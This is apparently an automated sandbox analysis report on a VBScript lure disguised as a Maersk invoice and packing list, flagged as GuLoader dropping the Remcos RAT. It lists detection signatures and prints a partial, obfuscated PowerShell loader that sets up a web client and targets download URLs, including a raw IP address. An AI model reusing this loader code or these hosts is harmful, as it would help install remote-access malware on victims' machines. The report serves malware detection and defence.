Windows
Analysis Report
Maersk_BL_Invoice_Packinglist.vbs
Overview
General Information
Detection
GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6172 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Maers k_BL_Invoi ce_Packing list.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 4412 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Byggefor etagender Jenda Nonm etallurgic ally Skala trinnets S iddembler Sokkefdder s doedsstr aale Filna vnene Tetr icalness T raadhegnen es Ironwor ks76 Rette rstedets j uridicial intetkoen Tankesyste mets48 Sid eprintets Opbevaring ens Hydron ically For bundsstate ns Pokeran sigtets Pu tzed Pardo nnerende R angsforske l Samarite rkursernes Byggefore tagender J enda Nonme tallurgica lly Skalat rinnets Si ddembler S okkefdders doedsstra ale Filnav nene Tetri calness Tr aadhegnene s Ironwork s76 Retter stedets ju ridicial i ntetkoen T ankesystem ets48 Side printets O pbevaringe ns Hydroni cally Forb undsstaten s Pokerans igtets Put zed Pardon nerende Ra ngsforskel Samariter kursernes' ;If (${hos t}.Current Culture) { $Bofllen++ ;}Function toddyerne s($Experie ntialistic ){$Larisas =$Experien tialistic. Length-$Bo fllen;$Str egninger=' SUBsTRI';$ Stregninge r+='ng';Fo r( $Trepan ationen=1; $Trepanati onen -lt $ Larisas;$T repanation en+=2){$By ggeforetag ender+=$Ex periential istic.$Str egninger.I nvoke( $Tr epanatione n, $Boflle n);}$Bygge foretagend er;}functi on Unoppor tunely($un exchangeab leness){ & ($Catguts ) ($unexch angeablene ss);}$Dokt orafhandli nger=toddy ernes 'HMT o z iMlVl, aM/ 5 .I0C ,( WHi n dSo w sP , NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2 T1R.K0G) G GSe cMkPoB /,2B0p1.0 0B1U0 1L F iRrBe,fSo HxS/M1A2D1 A.,0s ';$G rampa=todd yernes ' U PsCe rA- A UgSe,nSt, ';$Siddemb ler=toddye rnes 'Ahst tDp.s : / P/ cSo n,t FeEm e.g a P.Vc o,m . Dd oE/NO.u mtHgKa,s s e,d ..eTm Tz >,h t,t FpR: /,/ 1 0 3 .R1B9 P5,.I2.3M7 .P4,3D/,O UuNtSgDa.s ss,eSd . e Sm z. ';$H amskiftets =toddyerne s ' >. ';$ Catguts=to ddyernes ' iDe x, '; $arbejdsga ngene='Fil navnene';$ Characteri sation = t oddyernes 'AeBc.hIoN %.aSp pRd ,aUtUaB% \ PSTcAaGb.r o s.eHl,y D. Tho.rZ A& & .eVcC h,oH BtO ' ;Unopportu nely (todd yernes '.$ Cg lAoEb a .l.:OFFl a gSkTn,a p Rp.e rps,= (.c,m d H /ScS I$,C h a,rMaSck tBeIr,iGs, a t iFoUn, )U ');Unop portunely (toddyerne s 'b$sg l. oAbSaAl :A S.k a lBa tBr ipnPn, e.tTsT=S$N SCiRd dSe mAbPlHe r. . sSp,lCiY tG(U$ H.a mTsAk iDf t eBtIsK)S ');Unoppo rtunely (t oddyernes 'S[NN eCt. . S.e,r v, iUc e P o. i,n tBMdaC n a gKe rl ].:S:SSUe cAuRrtiNt ySPSrSoRtK oFc o l ,= , U[CNue t .. SSe cSu PrTiPt.y.P ur.oRtPoUc ,o l TSyAp eA]B:G: T blSs 1I2. ');$Siddem bler=$Skal atrinnets[ 0];$Trepan ationenlla udatory= ( toddyernes 'C$,g lAo b a l : S LoPlNdbe r iFe tRsS= N.eOwC- O NbUj eBc t SMyAs tS ePmF.BNVeA tK. W ePbY CMl i eDn t');$Trepa nationenll audatory+= $Flagknapp ers[1];Uno pportunely ($Trepana tionenllau datory);Un opportunel